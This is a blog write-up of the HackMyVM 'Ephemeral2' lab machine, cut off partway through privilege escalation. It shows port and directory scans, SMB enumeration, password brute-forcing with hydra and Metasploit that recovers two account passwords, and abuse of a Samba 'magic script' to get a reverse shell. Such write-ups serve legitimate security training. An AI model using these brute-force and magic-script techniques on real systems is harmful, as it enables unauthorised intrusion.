{"id":669,"date":"2024-04-30T21:09:02","date_gmt":"2024-04-30T13:09:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=669"},"modified":"2024-04-30T21:09:02","modified_gmt":"2024-04-30T13:09:02","slug":"hmv-_-ephemeral2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/669\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Ephemeral2"},"content":{"rendered":"<h1>Ephemeral2<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108718.png\" alt=\"image-20240430190439316\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108720.png\" alt=\"image-20240430191126501\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ rustscan -a 192.168.0.132 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.132:22\nOpen 192.168.0.132:80\nOpen 192.168.0.132:139\nOpen 192.168.0.132:445\n\nPORT    STATE SERVICE     REASON  VERSION\n22\/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 0a:cc:f1:53:7e:6b:31:2c:10:1e:6d:bc:01:b1:c3:a2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4EkKlQsLoJ+r82mQnd6FWkjL2Ry4tLVriMceGPvzHNFlbbkpa7kkAIf3TtOp7Tads45gLfrNVTC98MHegGZwvL3aIaFPp0LodGxJeQG2lgudoWY9M5sfLMd5oUpcykWXcZfpibQVVhQSpPg4tIpWRVrIKZrBo2CxV8XsRh5RevdNZzzJ6w3D8zuwaBkHD7KI+2eaiuAYrmEkbUVHLkstY\/nHclJwsDBMkx+u4gv7Rz3S37gmYhg8a74iZqqFpDF47AJ8fcC3k6pXQr3iArgpOU2Rc20THgwn8nRBit2CzO9C5DIf1KvoKIlNftYXK+Wnw2FmIGUmF7YxjC3ys1uXDahRjcW6EKZpRb2XKzPNtfoR+sdOPvLJkcXubn5\/HTuy5HKmfk7cByX6\/6KwYau11OxrM87YL+Fyl0VUobTKrC3570aaFamtWCd\/A7oB3xsxQ8pSr7l2Pjx+20BSGjvw7dkMG1Yecf\/79Db9f+DvxrLEIUOxRUWAGijr++Ar5s88=\n|   256 cd:19:04:a0:d1:8a:8b:3d:3e:17:ee:21:5d:cd:6e:49 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBlMZBD50d94mQuFM4n2frVjcsaG1yWdXgHdmKBMNddOg9M67uUbNp8jHiwF\/XQ36yiBGxPXWvvGoxI4oM97c3M=\n|   256 e5:6a:27:39:ed:a8:c9:03:46:f2:a5:8c:87:85:44:9e (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBwwUJchIYxvumcFeCwJ4yZnFQPfYLQj3dnAKrIU4j+1\n80\/tcp  open  http        syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_  Supported Methods: OPTIONS HEAD GET POST\n|_http-title: Apache2 Ubuntu Default Page: It works\n139\/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: 19m57s\n| nbstat: NetBIOS name: EPHEMERAL, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| Names:\n|   EPHEMERAL&lt;00&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   EPHEMERAL&lt;03&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   EPHEMERAL&lt;20&gt;        Flags: 
&lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2024-04-30T11:12:03\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 19990\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 18848\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 42628\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 39156\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.132\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.132\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,bak,jpg,txt,html,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 
278]\n\/index.html           (Status: 200) [Size: 10918]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.132\/javascript\/]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\n\/foodservice          (Status: 301) [Size: 320] [--&gt; http:\/\/192.168.0.132\/foodservice\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108721.png\" alt=\"image-20240430192445185\" style=\"zoom:50%;\" \/><\/p>\n<h3>Sensitive Directory<\/h3>\n<pre><code>http:\/\/192.168.0.132\/foodservice\/<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108722.png\" alt=\"image-20240430192751400\" style=\"zoom: 25%;\" \/><\/p>\n<h3>Sensitive Ports<\/h3>\n<p>Probing the SMB service:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ smbmap -H 192.168.0.132                       \n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.0.132:445       Name: ephemeral                 Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        SYSADMIN                                                NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (ephemeral server (Samba, Ubuntu))\n        Officejet_Pro_8600_CDECA1_                              NO ACCESS<\/code><\/pre>\n<p>No access to any share, so we need another way in; enumerate further:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ enum4linux 192.168.0.132\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Tue Apr 30 07:25:25 2024\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.0.132\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.0.132 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.0.132 )===============================\n\nLooking up status of 192.168.0.132\n        EPHEMERAL       &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        EPHEMERAL       &lt;03&gt; -         B &lt;ACTIVE&gt;  Messenger Service\n        EPHEMERAL       &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n        WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        WORKGROUP       &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser Service Elections\n\n        MAC Address = 00-00-00-00-00-00\n\n ===================================( Session Check on 192.168.0.132 )===================================\n\n[+] Server 192.168.0.132 allows sessions using username &#039;&#039;, password &#039;&#039;\n\n ================================( Getting domain SID for 192.168.0.132 )================================\n\nDomain Name: WORKGROUP\nDomain Sid: (NULL SID)\n\n[+] Can&#039;t determine if host is part of domain or part of a workgroup\n\n ==================================( OS information on 192.168.0.132 )==================================\n\n[E] Can&#039;t get OS info with smbclient\n\n[+] Got OS info for 192.168.0.132 from srvinfo: \n        EPHEMERAL      Wk Sv PrQ Unx NT SNT ephemeral server (Samba, Ubuntu)\n        platform_id     :       500\n        os version      :       6.1\n        server type     :       0x809a03\n\n =======================================( Users on 192.168.0.132 )=======================================\n\nindex: 0x1 RID: 0x3e9 acb: 0x00000010 Account: randy    Name: randy     Desc: \n\nuser:[randy] rid:[0x3e9]\n\n =================================( Share Enumeration on 192.168.0.132 
)=================================\n\nsmbXcli_negprot_smb1_done: No compatible protocol selected by server.\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        print$          Disk      Printer Drivers\n        SYSADMIN        Disk      \n        IPC$            IPC       IPC Service (ephemeral server (Samba, Ubuntu))\n        Officejet_Pro_8600_CDECA1_ Printer   \nReconnecting with SMB1 for workgroup listing.\nProtocol negotiation to server 192.168.0.132 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE\nUnable to connect with SMB1 -- no workgroup available\n\n[+] Attempting to map shares on 192.168.0.132\n\n\/\/192.168.0.132\/print$  Mapping: DENIED Listing: N\/A Writing: N\/A\n\/\/192.168.0.132\/SYSADMIN        Mapping: DENIED Listing: N\/A Writing: N\/A\n\n[E] Can&#039;t understand response:\n\nNT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*\n\/\/192.168.0.132\/IPC$    Mapping: N\/A Listing: N\/A Writing: N\/A\n\/\/192.168.0.132\/Officejet_Pro_8600_CDECA1_      Mapping: DENIED Listing: N\/A Writing: N\/A\n\n ===========================( Password Policy Information for 192.168.0.132 )===========================\n\n[+] Attaching to 192.168.0.132 using a NULL share\n\n[+] Trying protocol 139\/SMB...\n\n[+] Found domain(s):\n\n        [+] EPHEMERAL\n        [+] Builtin\n\n[+] Password Info for Domain: EPHEMERAL\n\n        [+] Minimum password length: 5\n        [+] Password history length: None\n        [+] Maximum password age: 37 days 6 hours 21 minutes \n        [+] Password Complexity Flags: 000000\n\n                [+] Domain Refuse Password Change: 0\n                [+] Domain Password Store Cleartext: 0\n                [+] Domain Password Lockout Admins: 0\n                [+] Domain Password No Clear Change: 0\n                [+] Domain Password No Anon Change: 0\n                [+] Domain Password Complex: 0\n\n        [+] Minimum password age: None\n        [+] Reset Account 
Lockout Counter: 30 minutes \n        [+] Locked Account Duration: 30 minutes \n        [+] Account Lockout Threshold: None\n        [+] Forced Log off Time: 37 days 6 hours 21 minutes \n\n[+] Retieved partial password policy with rpcclient:\n\nPassword Complexity: Disabled\nMinimum Password Length: 5\n\n ==================( Users on 192.168.0.132 via RID cycling (RIDS: 500-550,1000-1050) )==================\n\n[I] Found new SID: \nS-1-22-1\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[I] Found new SID: \nS-1-5-32\n\n[+] Enumerating users using SID S-1-22-1 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-22-1-1000 Unix User\\randy (Local User)\nS-1-22-1-1001 Unix User\\ralph (Local User)\n\n[+] Enumerating users using SID S-1-5-21-1796334311-1091253459-1090880117 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-5-21-1796334311-1091253459-1090880117-501 EPHEMERAL\\nobody (Local User)\nS-1-5-21-1796334311-1091253459-1090880117-513 EPHEMERAL\\None (Domain Group)\nS-1-5-21-1796334311-1091253459-1090880117-1001 EPHEMERAL\\randy (Local User)\n\n[+] Enumerating users using SID S-1-5-32 and logon username &#039;&#039;, password &#039;&#039;\n\nS-1-5-32-544 BUILTIN\\Administrators (Local Group)\nS-1-5-32-545 BUILTIN\\Users (Local Group)\nS-1-5-32-546 BUILTIN\\Guests (Local Group)\nS-1-5-32-547 BUILTIN\\Power Users (Local Group)\nS-1-5-32-548 BUILTIN\\Account Operators (Local Group)\nS-1-5-32-549 BUILTIN\\Server Operators (Local Group)\nS-1-5-32-550 BUILTIN\\Print Operators (Local Group)\n\n ===============================( Getting printer info for 192.168.0.132 )===============================\n\n        flags:[0x800000]\n        name:[\\\\192.168.0.132\\Officejet_Pro_8600_CDECA1_]\n        description:[\\\\192.168.0.132\\Officejet_Pro_8600_CDECA1_,,]\n        comment:[]\n\nenum4linux complete on Tue Apr 30 07:25:41 
2024<\/code><\/pre>\n<h3>SMB Brute Force<\/h3>\n<p>Tried brute-forcing the two accounts with hydra, but:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ hydra -L user.txt -P \/usr\/share\/wordlists\/rockyou.txt smb:\/\/192.168.0.132 \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-30 07:20:44\n[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)\n[DATA] max 1 task per 1 server, overall 1 task, 28688798 login tries (l:2\/p:14344399), ~28688798 tries per task\n[DATA] attacking smb:\/\/192.168.0.132:445\/\n[ERROR] target smb:\/\/192.168.0.132:445\/ does not support SMBv1<\/code><\/pre>\n<p>Try brute-forcing with <code>msf<\/code> instead:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/1-system-attack\/windows-attacks\/smb-psexec#smb-brute-force\">https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/1-system-attack\/windows-attacks\/smb-psexec#smb-brute-force<\/a><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smb#enumerate-users-groups-and-logged-on-users\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smb#enumerate-users-groups-and-logged-on-users<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ msfconsole     \nMetasploit tip: Use the edit command to open the currently active module \nin your editor\n\n  Metasploit Park, System Security Interface\n  Version 4.0.5, Alpha E\n  Ready...\n  &gt; access security\n  access: PERMISSION DENIED.\n  &gt; 
access security grid\n  access: PERMISSION DENIED.\n  &gt; access main security grid\n  access: PERMISSION DENIED....and...\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n  YOU DIDN&#039;T SAY THE MAGIC WORD!\n\n       =[ metasploit v6.4.2-dev                           ]\n+ -- --=[ 2408 exploits - 1240 auxiliary - 422 post       ]\n+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 &gt; search smb_login\n\nMatching Modules\n================\n\n   #  Name                             Disclosure Date  Rank    Check  Description\n   -  ----                             ---------------  ----    -----  -----------\n   0  auxiliary\/scanner\/smb\/smb_login  .                normal  No     SMB Login Check Scanner\n\nInteract with a module by name or index. 
For example info 0, use 0 or use auxiliary\/scanner\/smb\/smb_login\n\nmsf6 &gt; use 0\n[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; show options\n\nModule options (auxiliary\/scanner\/smb\/smb_login):\n\n   Name               Current Setting  Required  Description\n   ----               ---------------  --------  -----------\n   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected\n   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password\n   BLANK_PASSWORDS    false            no        Try blank passwords for all users\n   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5\n   CreateSession      false            no        Create a new session for every successful login\n   DB_ALL_CREDS       false            no        Try each user\/password couple stored in the current database\n   DB_ALL_PASS        false            no        Add all passwords in the current database to the list\n   DB_ALL_USERS       false            no        Add all users in the current database to the list\n   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&amp;realm)\n   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication\n   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user\n   PASS_FILE                           no        File containing passwords, one per line\n   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.\n   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]\n   RECORD_GUEST       false            no        Record guest-privileged random logins to the database\n   RHOSTS             
                 yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.htm\n                                                 l\n   RPORT              445              yes       The SMB service port (TCP)\n   SMBDomain          .                no        The Windows domain to use for authentication\n   SMBPass                             no        The password for the specified username\n   SMBUser                             no        The username to authenticate as\n   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host\n   THREADS            1                yes       The number of concurrent threads (max one per host)\n   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line\n   USER_AS_PASS       false            no        Try the username as the password for all users\n   USER_FILE                           no        File containing usernames, one per line\n   VERBOSE            true             yes       Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; set RHOSTS 192.168.0.132\nRHOSTS =&gt; 192.168.0.132\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; set USER_FILE \/home\/kali\/temp\/Ephemeral2\/user.txt\nUSER_FILE =&gt; \/home\/kali\/temp\/Ephemeral2\/user.txt\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; set PASS_FILE \/usr\/share\/metasploit-framework\/data\/wordlists\/unix_passwords.txt\nPASS_FILE =&gt; \/usr\/share\/metasploit-framework\/data\/wordlists\/unix_passwords.txt\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; set VERBOSE false\nVERBOSE =&gt; false\nmsf6 auxiliary(scanner\/smb\/smb_login) &gt; exploit\n\n[+] 192.168.0.132:445     - 192.168.0.132:445 - Success: &#039;.\\randy:pogiako&#039;\n[+] 192.168.0.132:445     - 192.168.0.132:445 - Success: &#039;.\\ralph:admin&#039;\n[*] 
192.168.0.132:445     - Scanned 1 of 1 hosts (100% complete)\n[*] 192.168.0.132:445     - Bruteforce completed, 2 credentials were successful.\n[*] 192.168.0.132:445     - You can open an SMB session with these credentials and CreateSession set to true\n[*] Auxiliary module execution completed<\/code><\/pre>\n<pre><code class=\"language-text\">randy   pogiako\nralph   admin<\/code><\/pre>\n<p>Try connecting with the recovered credentials:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ smbclient \/\/192.168.0.132\/SYSADMIN -U randy\nPassword for [WORKGROUP\\randy]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                   D        0  Sun Apr 10 21:13:45 2022\n  ..                                  D        0  Sun Apr 10 20:36:23 2022\n  reminder.txt                        N      193  Sun Apr 10 20:59:06 2022\n  smb.conf                            N     9097  Sat Apr  9 16:32:20 2022\n  help.txt                            N     4663  Sun Apr 10 20:59:43 2022\n\n                8704372 blocks of size 1024. 390320 blocks available\nsmb: \\&gt; get reminder.txt\ngetting file \\reminder.txt of size 193 as reminder.txt (5.9 KiloBytes\/sec) (average 5.9 KiloBytes\/sec)\nsmb: \\&gt; get smb.conf\ngetting file \\smb.conf of size 9097 as smb.conf (161.5 KiloBytes\/sec) (average 104.3 KiloBytes\/sec)\nsmb: \\&gt; get help.txt \ngetting file \\help.txt of size 4663 as help.txt (2276.7 KiloBytes\/sec) (average 153.1 KiloBytes\/sec)\nsmb: \\&gt; exit<\/code><\/pre>\n<p>Let's see what the files contain:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ cat reminder.txt \nHey randy! I just set up smb like you asked me too. I left a file for you if you ever need help accessing your smb share.\nFor now all your shares are going to be under [SYSADMIN]\n\nThank You.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ cat smb.conf\n................\n[SYSADMIN]\n\npath = \/home\/randy\/smbshare\nvalid users = randy\nbrowsable = yes\nwriteable = yes\nread only = no\nmagic script = smbscript.elf\nguest ok = no<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108723.png\" alt=\"image-20240430202834771\" \/><\/p>\n<p>Let's look this up:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108724.png\" alt=\"image-20240430203125036\" \/><\/p>\n<p>So it gets executed when we log in: we just prepare a reverse shell, name it <code>smbscript.elf<\/code>, and it will be run:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108725.png\" alt=\"image-20240430203618545\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108726.png\" alt=\"image-20240430203629828\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) randy@ephemeral:\/home\/randy$ find \/ -perm 
-u=s -type f 2&gt;\/dev\/null\n\/snap\/snapd\/21465\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1405\/usr\/bin\/chfn\n\/snap\/core20\/1405\/usr\/bin\/chsh\n\/snap\/core20\/1405\/usr\/bin\/gpasswd\n\/snap\/core20\/1405\/usr\/bin\/mount\n\/snap\/core20\/1405\/usr\/bin\/newgrp\n\/snap\/core20\/1405\/usr\/bin\/passwd\n\/snap\/core20\/1405\/usr\/bin\/su\n\/snap\/core20\/1405\/usr\/bin\/sudo\n\/snap\/core20\/1405\/usr\/bin\/umount\n\/snap\/core20\/1405\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1405\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1328\/usr\/bin\/chfn\n\/snap\/core20\/1328\/usr\/bin\/chsh\n\/snap\/core20\/1328\/usr\/bin\/gpasswd\n\/snap\/core20\/1328\/usr\/bin\/mount\n\/snap\/core20\/1328\/usr\/bin\/newgrp\n\/snap\/core20\/1328\/usr\/bin\/passwd\n\/snap\/core20\/1328\/usr\/bin\/su\n\/snap\/core20\/1328\/usr\/bin\/sudo\n\/snap\/core20\/1328\/usr\/bin\/umount\n\/snap\/core20\/1328\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1328\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/passwd\n\/usr\/bin\/fusermount\n\/usr\/bin\/newgrp\n\/usr\/bin\/vmware-user-suid-wrapper\n\/usr\/bin\/chfn\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/sbin\/pppd\n(remote) randy@ephemeral:\/home\/randy$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/snap\/core20\/1405\/usr\/bin\/ping = cap_net_raw+ep\n\/snap\/core20\/1328\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = 
cap_net_bind_service,cap_net_admin+ep\n(remote) randy@ephemeral:\/home\/randy$ ss -tulup\nNetid         State          Recv-Q         Send-Q                 Local Address:Port                         Peer Address:Port         Process         \nudp           UNCONN         0              0                            0.0.0.0:631                               0.0.0.0:*                            \nudp           UNCONN         0              0                      127.0.0.53%lo:domain                            0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.255:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.132:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:netbios-ns                        0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.255:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                      192.168.0.132:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:netbios-dgm                       0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:42181                             0.0.0.0:*                            \nudp           UNCONN         0              0                            0.0.0.0:mdns                              0.0.0.0:*                            \nudp           UNCONN         0              0                               [::]:48880                                [::]:*                            \nudp           UNCONN         0              0                 
              [::]:mdns                                 [::]:*                            \ntcp           LISTEN         0              4096                   127.0.0.53%lo:domain                            0.0.0.0:*                            \ntcp           LISTEN         0              128                          0.0.0.0:ssh                               0.0.0.0:*                            \ntcp           LISTEN         0              5                          127.0.0.1:ipp                               0.0.0.0:*                            \ntcp           LISTEN         0              50                           0.0.0.0:microsoft-ds                      0.0.0.0:*                            \ntcp           LISTEN         0              50                           0.0.0.0:netbios-ssn                       0.0.0.0:*                            \ntcp           LISTEN         0              511                                *:http                                    *:*                            \ntcp           LISTEN         0              128                             [::]:ssh                                  [::]:*                            \ntcp           LISTEN         0              5                              [::1]:ipp                                  [::]:*                            \ntcp           LISTEN         0              50                              [::]:microsoft-ds                         [::]:*                            \ntcp           LISTEN         0              50                              [::]:netbios-ssn                          [::]:*     <\/code><\/pre>\n<p>Tried switching users without success; next, upload 